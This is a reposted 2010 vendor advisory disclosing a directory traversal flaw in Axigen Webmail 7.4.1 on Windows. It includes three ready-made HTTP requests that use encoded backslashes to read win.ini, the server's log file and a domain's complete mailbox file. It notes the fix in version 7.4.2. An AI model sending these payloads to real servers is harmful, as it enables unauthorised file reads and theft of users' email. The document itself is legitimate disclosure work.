Directory Traversal in Axigen v7.4.1 running on Windows

2010-09-17T00:00:00
ID SECURITYVULNS:DOC:24766
Type securityvulns
Reporter Securityvulns
Modified 2010-09-17T00:00:00

Description

We are continuing with the list of security vulnerabilities found in a number of web applications while testing our latest version of Acunetix WVS v7 . In this blog post, we will look into the details of a very serious web vulnerability discovered by Acunetix WVS in Axigen.

"Axigen is an integrated email, calendaring & collaboration platform, masterfully built on our unique Linux mail server technology, for increased speed & security."

Axigen Webmail version 7.4.1 is vulnerable to a directory traversal vulnerability. Only Axigen installations running on Windows platforms are affected. By URL encoding the "\" character to %5C it's possible to bypass the directory traversal protection available in this application.

By requesting the following URL (/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini) it's possible to read the contents of file c:\windows\win.ini. Using this encoding trick you can traverse directories and see the contents of any file that is readable by the web server use

Here is a sample HTTP request:

GET http://192.168.0.222:80/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini HTTP/1.1 Cookie: webmailSession=0; cookieTest=cookiesEnabled; checkOverQuota=0; passwordExpireWarning=0 Host: 192.168.0.222:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

While investigating this alert, I've discovered that this vulnerability is more serious than I initially expected. This is a very serious vulnerability because using information from the log files it's possible to gather enough information to read the file containing all the emails from all the domains hosted on the server.

For, example, using an HTTP request like:

GET /..%5c..%5c/log/everything.txt HTTP/1.0 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: 192.168.0.222 Connection: Close Pragma: no-cache

you can access the log file. From here you get determine the domain name and using this information you can read the file containing all the emails from this domain:

GET /..%5c..%5c/domains/localdomain/00.hsf HTTP/1.0 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: 192.168.0.222 Connection: Close Pragma: no-cache

This vulnerability was reported to the Axigen team on 22/7/2010 via the support system on their website and they were fixed in Axigen version 7.4.2. If you are using Axigen, download the latest version from their website.

-- Bogdan Calin - bogdan [at] acunetix.com CTO Acunetix Ltd. - http://www.acunetix.com Acunetix Web Security Blog - http://www.acunetix.com/blog Follow us on Twitter - http://www.twitter.com/acunetix